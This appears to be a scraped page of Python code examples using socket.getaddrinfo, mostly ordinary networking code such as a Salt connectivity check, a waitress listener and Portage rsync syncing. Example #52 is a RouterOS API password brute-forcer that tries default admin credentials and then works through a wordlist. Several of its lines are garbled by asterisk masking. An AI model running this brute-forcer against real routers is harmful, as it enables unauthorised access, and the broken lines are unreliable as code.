HOST = None  # Symbolic name meaning all available interfaces
PORT = 50007  # Arbitrary non-privileged port
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM,
                              0, socket.AI_PASSIVE):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except socket.error as msg:
        s = None
        continue
    try:
        s.bind(sa)
        s.listen(1)
    except socket.error as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print 'could not open socket'
    sys.exit(1)
while 1:
    conn, addr = s.accept()
    print 'Connected by', addr
Example #51
0
def connect(host, port=None, **kwargs):
    '''
    Test connectivity to a host using a particular
    port from the minion.

    .. versionadded:: 2014.7

    CLI Example:

    .. code-block:: bash

        salt '*' network.connect archlinux.org 80

        salt '*' network.connect archlinux.org 80 timeout=3

        salt '*' network.connect archlinux.org 80 timeout=3 family=ipv4

        salt '*' network.connect google-public-dns-a.google.com port=53 proto=udp timeout=3
    '''

    ret = {'result': None,
           'comment': ''}

    if not host:
        ret['result'] = False
        ret['comment'] = 'Required argument, host, is missing.'
        return ret

    if not port:
        ret['result'] = False
        ret['comment'] = 'Required argument, port, is missing.'
        return ret

    proto = kwargs.get('proto', 'tcp')
    timeout = kwargs.get('timeout', 5)
    family = kwargs.get('family', None)

    if salt.utils.validate.net.ipv4_addr(host) or salt.utils.validate.net.ipv6_addr(host):
        address = host
    else:
        address = '{0}'.format(salt.utils.network.sanitize_host(host))

    try:
        if proto == 'udp':
            __proto = socket.SOL_UDP
        else:
            __proto = socket.SOL_TCP
            proto = 'tcp'

        if family:
            if family == 'ipv4':
                __family = socket.AF_INET
            elif family == 'ipv6':
                __family = socket.AF_INET6
            else:
                __family = 0
        else:
            __family = 0

        (family,
         socktype,
         _proto,
         garbage,
         _address) = socket.getaddrinfo(address, port, __family, 0, __proto)[0]

        skt = socket.socket(family, socktype, _proto)
        skt.settimeout(timeout)

        if proto == 'udp':
            # Generate a random string of a
            # decent size to test UDP connection
            md5h = hashlib.md5()
            md5h.update(datetime.datetime.now().strftime('%s'))
            msg = md5h.hexdigest()
            skt.sendto(msg, _address)
            recv, svr = skt.recvfrom(255)
            skt.close()
        else:
            skt.connect(_address)
            skt.shutdown(2)
    except Exception as exc:
        ret['result'] = False
        try:
            errno, errtxt = exc
        except ValueError:
            ret['comment'] = 'Unable to connect to {0} ({1}) on {2} port {3}'.format(host, _address[0], proto, port)
        else:
            ret['comment'] = '{0}'.format(errtxt)
        return ret

    ret['result'] = True
    ret['comment'] = 'Successfully connected to {0} ({1}) on {2} port {3}'.format(host, _address[0], proto, port)
    return ret
Example #52
0
def main():
    print(banner)
    try:
        opts, args = getopt.getopt(sys.argv[1:], "ht:p:u:d:s:q", [
            "help", "target=", "port=", "user="******"dictionary=", "seconds=",
            "quiet"
        ])
    except getopt.GetoptError as err:
        error(err)
        sys.exit(2)

    if not opts:
        error("ERROR: You must specify at least a Target and a Dictionary")
        sys.exit(2)

    target = None
    port = None
    user = None
    dictionary = None
    quietmode = False
    seconds = None

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt in ("-t", "--target"):
            target = arg
        elif opt in ("-p", "--port"):
            port = arg
        elif opt in ("-u", "--user"):
            user = arg
        elif opt in ("-d", "--dictionary"):
            dictionary = arg
        elif opt in ("-s", "--seconds"):
            seconds = arg
        elif opt in ("-q", "--quiet"):
            quietmode = True
        else:
            assert False, "error"
            sys.exit(2)

    if not target:
        error("ERROR: You must specify a Target")
        sys.exit(2)
    if not dictionary:
        error("ERROR: You must specify a Dictionary")
        sys.exit(2)
    if not port:
        port = 8728
    if not user:
        user = '******'
    if not seconds:
        seconds = 1

    print("[*] Starting bruteforce attack...")
    print("-" * 33)

    # Catch KeyboardInterrupt
    signal.signal(signal.SIGINT, signal_handler)

    # Looking for default RouterOS creds
    defcredcheck = True

    # Get the number of lines in file
    count = 0
    dictFile = codecs.open(dictionary, 'rb', encoding='utf-8', errors='ignore')
    while 1:
        buffer = dictFile.read(8192 * 1024)
        if not buffer: break
        count += buffer.count('\n')
    dictFile.seek(0)

    items = 1
    for password in dictFile.readlines():
        password = password.strip('\n\r ')
        s = None
        for res in socket.getaddrinfo(target, port, socket.AF_UNSPEC,
                                      socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                s = socket.socket(af, socktype, proto)
                # Timeout threshold = 5 secs
                s.settimeout(5)
            except (socket.error):
                s = None
                continue
            try:
                s.connect(sa)
            except (socket.timeout):
                print("[-] Target timed out! Exiting...")
                s.close()
                sys.exit(1)
            except (socket.error):
                print(
                    "[-] SOCKET ERROR! Check Target (IP or PORT parameters). Exiting..."
                )
                s.close()
                sys.exit(1)
        dictFile.close()
        apiros = ApiRos(s)

        # First of all, we'll try with RouterOS default credentials ("admin":"")
        while defcredcheck:
            defaultcreds = apiros.login("admin", "")
            login = ''.join(defaultcreds[0][0])

            print("[-] Trying with default credentials on RouterOS...")
            print()

            if login == "!done":
                print(
                    "[+] Login successful!!! Default RouterOS credentials were not changed. Log in with admin:<BLANK>"
                )
                sys.exit(0)
            else:
                print(
                    "[-] Default RouterOS credentials were unsuccessful, trying with "
                    + str(count) + " passwords in list...")
                print("")
                defcredcheck = False
                time.sleep(1)

        loginoutput = apiros.login(user, password)
        login = ''.join(loginoutput[0][0])

        if not quietmode:
            print("[-] Trying " + str(items) + " of " + str(count) +
                  " Paswords - Current: " + password)

        if login == "!done":
            print("[+] Login successful!!! User: "******" Password: "******"[*] ATTACK FINISHED! No suitable credentials were found. Try again with a different wordlist."
    )
    run(count)
Example #53
0
def _a_lookup(hostname: str) -> List[str]:
    return [addressinfo[4][0]
            for addressinfo in socket.getaddrinfo(hostname, 25)]
Example #54
0
import socket
import sys

PORT = 3000

infos = socket.getaddrinfo('127.0.0.1', PORT)

stream_info = [i for i in infos if i[1] == socket.SOCK_STREAM][0]

client = socket.socket(*stream_info[:3])

client.connect(stream_info[-1])

message = str(sys.argv[1])

client.sendall(message.encode('utf8'))

buffer_length = 8

message_complete = False

server_message = ''

while not message_complete:
    part = client.recv(buffer_length)
    server_message += part
    if len(part) < buffer_length:
        break

server_message = server_message.decode('utf8')
print(server_message)
Example #55
0
def get_hostname():
    return socket.getaddrinfo(
        socket.gethostname(), 0, 0, 0, 0, socket.AI_CANONNAME)[0][3]
Example #56
0
		while True:
			led = urandom.getrandbits(4) % numLEDs
			np.fill((0,0,0))
			for i in range(-255, 255, 10):                                                                                                            
				np[led] = (abs(i),abs(i),abs(i))                                                                                                    
				np.write()                                                                                                                            
				time.sleep(0.02)
	elif(r.startswith("/CLEAR")):
		np.fill((0,0,0))
		np.write()
	elif(r.startswith("/TEST")):
		np[1] = (urandom.getrandbits(8), urandom.getrandbits(8), urandom.getrandbits(8))
		np.write()


addr = socket.getaddrinfo('0.0.0.0', 8080)[0][-1]
s = socket.socket()
s.bind(addr)
s.listen(1)

while True:
	text = ''
	cl, addr = s.accept()
	cl_file = cl.makefile('rwb', 0)
	while True:
		line = str(cl_file.readline(), 'utf8')
		if not line or not line.startswith("GET"):
			break
		print((addr[0], line))
		req = line.split()[1]
		handleREQ(req)
Example #57
0
    def __init__(self,
                 hub,
                 name=None,
                 description=None,
                 metadata=None,
                 addr=None,
                 port=0,
                 https=False,
                 key_file=None,
                 cert_file=None,
                 cert_reqs=0,
                 ca_certs=None,
                 ssl_version=None,
                 callable=True):

        # GENERAL
        self._is_running = False
        self._is_registered = False

        if metadata is None:
            metadata = {}

        if name is not None:
            metadata["samp.name"] = name

        if description is not None:
            metadata["samp.description.text"] = description

        self._metadata = metadata

        self._addr = addr
        self._port = port
        self._xmlrpcAddr = None
        self._callable = callable

        # HUB INTERACTION
        self.client = None
        self._public_id = None
        self._private_key = None
        self._hub_id = None
        self._notification_bindings = {}
        self._call_bindings = {
            "samp.app.ping": [self._ping, {}],
            "client.env.get": [self._client_env_get, {}]
        }
        self._response_bindings = {}

        self._host_name = "127.0.0.1"
        if internet_on():
            try:
                self._host_name = socket.getfqdn()
                socket.getaddrinfo(self._addr or self._host_name, self._port
                                   or 0)
            except socket.error:
                self._host_name = "127.0.0.1"

        self.hub = hub

        if self._callable:

            self._thread = threading.Thread(target=self._serve_forever)
            self._thread.daemon = True

            if SSL_SUPPORT and https:
                self.client = SecureXMLRPCServer(
                    (self._addr or self._host_name, self._port),
                    key_file,
                    cert_file,
                    cert_reqs,
                    ca_certs,
                    ssl_version,
                    log,
                    logRequests=False,
                    allow_none=True)
            else:
                self.client = ThreadingXMLRPCServer(
                    (self._addr or self._host_name, self._port),
                    logRequests=False,
                    allow_none=True)

            self.client.register_introspection_functions()
            self.client.register_function(self.receive_notification,
                                          'samp.client.receiveNotification')
            self.client.register_function(self.receive_call,
                                          'samp.client.receiveCall')
            self.client.register_function(self.receive_response,
                                          'samp.client.receiveResponse')

            # If the port was set to zero, then the operating system has
            # selected a free port. We now check what this port number is.
            if self._port == 0:
                self._port = self.client.socket.getsockname()[1]

            if SSL_SUPPORT and https:
                protocol = 'https'
            else:
                protocol = 'http'

            self._xmlrpcAddr = urlunparse(
                (protocol, '{0}:{1}'.format(self._addr or self._host_name,
                                            self._port), '', '', '', ''))
Example #58
0
    sys.stdout.flush()
    if False:
        logger.info('checking dns for instances')
        nChecked = 0
        badGais = []
        for inst in checkedInstances:
            if inst['state'] == 'checked':
                nChecked += 1
                iid = inst['_id']
                abbrevIid = iid[0:16]
                #logger.info( 'checking dns for %s', abbrevIid )
                host = inst['ssh']['host']
                port = inst['ssh']['port']
                try:
                    info = socket.getaddrinfo(host, port)
                except Exception as exc:
                    logger.warning('gai failed for host "%s", port %d, %s',
                                   host, port, iid)
                    logger.warning('error (%d) %s', exc.errno, exc)
                    if exc.errno != socket.EAI_NONAME:
                        logger.warning('(unusual error)')
                    badGais.append((inst, exc))
        logger.info('%d bad gai out of %d checked', len(badGais), nChecked)
    # collect ram totals
    #ramByDevId = {}
    #for inst in startedInstances:
    #    ramByDevId[ inst['device-id'] ] = inst['ram']['total'] / 1000000
    lowRiders = checkedInstancesDf[(checkedInstancesDf.dpr < 39)
                                   & (checkedInstancesDf.dpr >= 24)]
Example #59
0
    def __init__(self, **kw):

        if 'listen' in kw and ('host' in kw or 'port' in kw):
            raise ValueError(
                'host and or port may not be set if listen is set.')

        for k, v in kw.items():
            if k not in self._param_map:
                raise ValueError('Unknown adjustment %r' % k)
            setattr(self, k, self._param_map[k](v))

        if (not isinstance(self.host, _str_marker)
                or not isinstance(self.port, _int_marker)):
            self.listen = ['{}:{}'.format(self.host, self.port)]

        enabled_families = socket.AF_UNSPEC

        if self.ipv4 and not self.ipv6:
            enabled_families = socket.AF_INET

        if not self.ipv4 and self.ipv6:
            enabled_families = socket.AF_INET6

        wanted_sockets = []
        hp_pairs = []
        for i in self.listen:
            if ':' in i:
                (host, port) = i.rsplit(":", 1)

                # IPv6 we need to make sure that we didn't split on the address
                if ']' in port:  # pragma: nocover
                    (host, port) = (i, str(self.port))
            else:
                (host, port) = (i, str(self.port))

            try:
                if '[' in host and ']' in host:  # pragma: nocover
                    host = host.strip('[').rstrip(']')

                if host == '*':
                    host = None

                for s in socket.getaddrinfo(host, port, enabled_families,
                                            socket.SOCK_STREAM,
                                            socket.IPPROTO_TCP,
                                            socket.AI_PASSIVE):
                    (family, socktype, proto, _, sockaddr) = s

                    # It seems that getaddrinfo() may sometimes happily return
                    # the same result multiple times, this of course makes
                    # bind() very unhappy...
                    #
                    # Split on %, and drop the zone-index from the host in the
                    # sockaddr. Works around a bug in OS X whereby
                    # getaddrinfo() returns the same link-local interface with
                    # two different zone-indices (which makes no sense what so
                    # ever...) yet treats them equally when we attempt to bind().
                    if (sockaddr[1] == 0 or (sockaddr[0].split(
                            '%', 1)[0], sockaddr[1]) not in hp_pairs):
                        wanted_sockets.append(
                            (family, socktype, proto, sockaddr))
                        hp_pairs.append((sockaddr[0].split('%',
                                                           1)[0], sockaddr[1]))
            except:
                raise ValueError('Invalid host/port specified.')

        self.listen = wanted_sockets
Example #60
0
    def update(self):
        '''Internal update function which performs the transfer'''
        opts = self.options.get('emerge_config').opts
        self.usersync_uid = self.options.get('usersync_uid', None)
        enter_invalid = '--ask-enter-invalid' in opts
        quiet = '--quiet' in opts
        out = portage.output.EOutput(quiet=quiet)
        syncuri = self.repo.sync_uri
        if self.repo.module_specific_options.get('sync-rsync-vcs-ignore',
                                                 'false').lower() == 'true':
            vcs_dirs = ()
        else:
            vcs_dirs = frozenset(VCS_DIRS)
            vcs_dirs = vcs_dirs.intersection(os.listdir(self.repo.location))

        for vcs_dir in vcs_dirs:
            writemsg_level(("!!! %s appears to be under revision " + \
             "control (contains %s).\n!!! Aborting rsync sync "
             "(override with \"sync-rsync-vcs-ignore = true\" in repos.conf).\n") % \
             (self.repo.location, vcs_dir), level=logging.ERROR, noiselevel=-1)
            return (1, False)
        self.timeout = 180

        rsync_opts = []
        if self.settings["PORTAGE_RSYNC_OPTS"] == "":
            rsync_opts = self._set_rsync_defaults()
        else:
            rsync_opts = self._validate_rsync_opts(rsync_opts, syncuri)
        self.rsync_opts = self._rsync_opts_extend(opts, rsync_opts)

        self.extra_rsync_opts = list()
        if self.repo.module_specific_options.get('sync-rsync-extra-opts'):
            self.extra_rsync_opts.extend(
                portage.util.shlex_split(
                    self.repo.module_specific_options['sync-rsync-extra-opts'])
            )

        # Process GLEP74 verification options.
        # Default verification to 'no'; it's enabled for ::gentoo
        # via default repos.conf though.
        self.verify_metamanifest = (self.repo.module_specific_options.get(
            'sync-rsync-verify-metamanifest', 'no') in ('yes', 'true'))
        # Support overriding job count.
        self.verify_jobs = self.repo.module_specific_options.get(
            'sync-rsync-verify-jobs', None)
        if self.verify_jobs is not None:
            try:
                self.verify_jobs = int(self.verify_jobs)
                if self.verify_jobs < 0:
                    raise ValueError(self.verify_jobs)
            except ValueError:
                writemsg_level(
                    "!!! sync-rsync-verify-jobs not a positive integer: %s\n" %
                    (self.verify_jobs, ),
                    level=logging.WARNING,
                    noiselevel=-1)
                self.verify_jobs = None
            else:
                if self.verify_jobs == 0:
                    # Use the apparent number of processors if gemato
                    # supports it.
                    self.verify_jobs = None
        # Support overriding max age.
        self.max_age = self.repo.module_specific_options.get(
            'sync-rsync-verify-max-age', '')
        if self.max_age:
            try:
                self.max_age = int(self.max_age)
                if self.max_age < 0:
                    raise ValueError(self.max_age)
            except ValueError:
                writemsg_level(
                    "!!! sync-rsync-max-age must be a non-negative integer: %s\n"
                    % (self.max_age, ),
                    level=logging.WARNING,
                    noiselevel=-1)
                self.max_age = 0
        else:
            self.max_age = 0

        openpgp_env = None
        if self.verify_metamanifest and gemato is not None:
            # Use isolated environment if key is specified,
            # system environment otherwise
            if self.repo.sync_openpgp_key_path is not None:
                openpgp_env = gemato.openpgp.OpenPGPEnvironment()
            else:
                openpgp_env = gemato.openpgp.OpenPGPSystemEnvironment()

        try:
            # Load and update the keyring early. If it fails, then verification
            # will not be performed and the user will have to fix it and try again,
            # so we may as well bail out before actual rsync happens.
            if openpgp_env is not None and self.repo.sync_openpgp_key_path is not None:

                try:
                    out.einfo('Using keys from %s' %
                              (self.repo.sync_openpgp_key_path, ))
                    with io.open(self.repo.sync_openpgp_key_path, 'rb') as f:
                        openpgp_env.import_key(f)
                    out.ebegin('Refreshing keys from keyserver')
                    retry_decorator = self._key_refresh_retry_decorator()
                    if retry_decorator is None:
                        openpgp_env.refresh_keys()
                    else:

                        def noisy_refresh_keys():
                            """
							Since retry does not help for some types of
							errors, display errors as soon as they occur.
							"""
                            try:
                                openpgp_env.refresh_keys()
                            except Exception as e:
                                writemsg_level("%s\n" % (e, ),
                                               level=logging.ERROR,
                                               noiselevel=-1)
                                raise  # retry

                        # The ThreadPoolExecutor that asyncio uses by default
                        # does not support cancellation of tasks, therefore
                        # use ForkExecutor for task cancellation support, in
                        # order to enforce timeouts.
                        loop = global_event_loop()
                        with ForkExecutor(loop=loop) as executor:
                            func_coroutine = functools.partial(
                                loop.run_in_executor, executor,
                                noisy_refresh_keys)
                            decorated_func = retry_decorator(func_coroutine,
                                                             loop=loop)
                            loop.run_until_complete(decorated_func())
                    out.eend(0)
                except (GematoException, asyncio.TimeoutError) as e:
                    writemsg_level(
                        "!!! Manifest verification impossible due to keyring problem:\n%s\n"
                        % (e, ),
                        level=logging.ERROR,
                        noiselevel=-1)
                    return (1, False)

            # Real local timestamp file.
            self.servertimestampfile = os.path.join(self.repo.location,
                                                    "metadata",
                                                    "timestamp.chk")

            content = portage.util.grabfile(self.servertimestampfile)
            timestamp = 0
            if content:
                try:
                    timestamp = time.mktime(
                        time.strptime(content[0], TIMESTAMP_FORMAT))
                except (OverflowError, ValueError):
                    pass
            del content

            try:
                self.rsync_initial_timeout = \
                 int(self.settings.get("PORTAGE_RSYNC_INITIAL_TIMEOUT", "15"))
            except ValueError:
                self.rsync_initial_timeout = 15

            try:
                maxretries = int(self.settings["PORTAGE_RSYNC_RETRIES"])
            except SystemExit as e:
                raise  # Needed else can't exit
            except:
                maxretries = -1  #default number of retries

            if syncuri.startswith("file://"):
                self.proto = "file"
                dosyncuri = syncuri[7:]
                unchanged, is_synced, exitcode, updatecache_flg = self._do_rsync(
                    dosyncuri, timestamp, opts)
                self._process_exitcode(exitcode, dosyncuri, out, 1)
                return (exitcode, updatecache_flg)

            retries = 0
            try:
                self.proto, user_name, hostname, port = re.split(
                    r"(rsync|ssh)://([^:/]+@)?(\[[:\da-fA-F]*\]|[^:/]*)(:[0-9]+)?",
                    syncuri,
                    maxsplit=4)[1:5]
            except ValueError:
                writemsg_level("!!! sync-uri is invalid: %s\n" % syncuri,
                               noiselevel=-1,
                               level=logging.ERROR)
                return (1, False)

            self.ssh_opts = self.settings.get("PORTAGE_SSH_OPTS")

            if port is None:
                port = ""
            if user_name is None:
                user_name = ""
            if re.match(r"^\[[:\da-fA-F]*\]$", hostname) is None:
                getaddrinfo_host = hostname
            else:
                # getaddrinfo needs the brackets stripped
                getaddrinfo_host = hostname[1:-1]
            updatecache_flg = False
            all_rsync_opts = set(self.rsync_opts)
            all_rsync_opts.update(self.extra_rsync_opts)

            family = socket.AF_UNSPEC
            if "-4" in all_rsync_opts or "--ipv4" in all_rsync_opts:
                family = socket.AF_INET
            elif socket.has_ipv6 and \
             ("-6" in all_rsync_opts or "--ipv6" in all_rsync_opts):
                family = socket.AF_INET6

            addrinfos = None
            uris = []

            try:
                addrinfos = getaddrinfo_validate(
                    socket.getaddrinfo(getaddrinfo_host, None, family,
                                       socket.SOCK_STREAM))
            except socket.error as e:
                writemsg_level("!!! getaddrinfo failed for '%s': %s\n" %
                               (_unicode_decode(hostname), _unicode(e)),
                               noiselevel=-1,
                               level=logging.ERROR)

            if addrinfos:

                AF_INET = socket.AF_INET
                AF_INET6 = None
                if socket.has_ipv6:
                    AF_INET6 = socket.AF_INET6

                ips_v4 = []
                ips_v6 = []

                for addrinfo in addrinfos:
                    if addrinfo[0] == AF_INET:
                        ips_v4.append("%s" % addrinfo[4][0])
                    elif AF_INET6 is not None and addrinfo[0] == AF_INET6:
                        # IPv6 addresses need to be enclosed in square brackets
                        ips_v6.append("[%s]" % addrinfo[4][0])

                random.shuffle(ips_v4)
                random.shuffle(ips_v6)

                # Give priority to the address family that
                # getaddrinfo() returned first.
                if AF_INET6 is not None and addrinfos and \
                 addrinfos[0][0] == AF_INET6:
                    ips = ips_v6 + ips_v4
                else:
                    ips = ips_v4 + ips_v6

                for ip in ips:
                    uris.append(
                        syncuri.replace(
                            "//" + user_name + hostname + port + "/",
                            "//" + user_name + ip + port + "/", 1))

            if not uris:
                # With some configurations we need to use the plain hostname
                # rather than try to resolve the ip addresses (bug #340817).
                uris.append(syncuri)

            # reverse, for use with pop()
            uris.reverse()
            uris_orig = uris[:]

            effective_maxretries = maxretries
            if effective_maxretries < 0:
                effective_maxretries = len(uris) - 1

            local_state_unchanged = True
            while (1):
                if uris:
                    dosyncuri = uris.pop()
                elif maxretries < 0 or retries > maxretries:
                    writemsg("!!! Exhausted addresses for %s\n" %
                             _unicode_decode(hostname),
                             noiselevel=-1)
                    return (1, False)
                else:
                    uris.extend(uris_orig)
                    dosyncuri = uris.pop()

                if (retries == 0):
                    if "--ask" in opts:
                        uq = UserQuery(opts)
                        if uq.query("Do you want to sync your Portage tree " + \
                         "with the mirror at\n" + blue(dosyncuri) + bold("?"),
                         enter_invalid) == "No":
                            print()
                            print("Quitting.")
                            print()
                            sys.exit(128 + signal.SIGINT)
                    self.logger(self.xterm_titles,
                                ">>> Starting rsync with " + dosyncuri)
                    if "--quiet" not in opts:
                        print(">>> Starting rsync with " + dosyncuri + "...")
                else:
                    self.logger(self.xterm_titles,
                     ">>> Starting retry %d of %d with %s" % \
                      (retries, effective_maxretries, dosyncuri))
                    writemsg_stdout(
                     "\n\n>>> Starting retry %d of %d with %s\n" % \
                     (retries, effective_maxretries, dosyncuri), noiselevel=-1)

                if dosyncuri.startswith('ssh://'):
                    dosyncuri = dosyncuri[6:].replace('/', ':/', 1)

                unchanged, is_synced, exitcode, updatecache_flg = self._do_rsync(
                    dosyncuri, timestamp, opts)
                if not unchanged:
                    local_state_unchanged = False
                if is_synced:
                    break

                retries = retries + 1

                if maxretries < 0 or retries <= maxretries:
                    print(">>> Retrying...")
                else:
                    # over retries
                    # exit loop
                    exitcode = EXCEEDED_MAX_RETRIES
                    break
            self._process_exitcode(exitcode, dosyncuri, out, maxretries)

            # if synced successfully, verify now
            if exitcode == 0 and self.verify_metamanifest:
                if gemato is None:
                    writemsg_level(
                        "!!! Unable to verify: gemato-11.0+ is required\n",
                        level=logging.ERROR,
                        noiselevel=-1)
                    exitcode = 127
                else:
                    try:
                        # we always verify the Manifest signature, in case
                        # we had to deal with key revocation case
                        m = gemato.recursiveloader.ManifestRecursiveLoader(
                            os.path.join(self.repo.location, 'Manifest'),
                            verify_openpgp=True,
                            openpgp_env=openpgp_env,
                            max_jobs=self.verify_jobs)
                        if not m.openpgp_signed:
                            raise RuntimeError(
                                'OpenPGP signature not found on Manifest')

                        ts = m.find_timestamp()
                        if ts is None:
                            raise RuntimeError(
                                'Timestamp not found in Manifest')
                        if (self.max_age != 0
                                and (datetime.datetime.utcnow() - ts.ts).days >
                                self.max_age):
                            out.quiet = False
                            out.ewarn(
                                'Manifest is over %d days old, this is suspicious!'
                                % (self.max_age, ))
                            out.ewarn(
                                'You may want to try using another mirror and/or reporting this one:'
                            )
                            out.ewarn('  %s' % (dosyncuri, ))
                            out.ewarn('')
                            out.quiet = quiet

                        out.einfo('Manifest timestamp: %s UTC' % (ts.ts, ))
                        out.einfo('Valid OpenPGP signature found:')
                        out.einfo(
                            '- primary key: %s' %
                            (m.openpgp_signature.primary_key_fingerprint))
                        out.einfo('- subkey: %s' %
                                  (m.openpgp_signature.fingerprint))
                        out.einfo('- timestamp: %s UTC' %
                                  (m.openpgp_signature.timestamp))

                        # if nothing has changed, skip the actual Manifest
                        # verification
                        if not local_state_unchanged:
                            out.ebegin('Verifying %s' % (self.repo.location, ))
                            m.assert_directory_verifies()
                            out.eend(0)
                    except GematoException as e:
                        writemsg_level(
                            "!!! Manifest verification failed:\n%s\n" % (e, ),
                            level=logging.ERROR,
                            noiselevel=-1)
                        exitcode = 1

            return (exitcode, updatecache_flg)
        finally:
            if openpgp_env is not None:
                openpgp_env.close()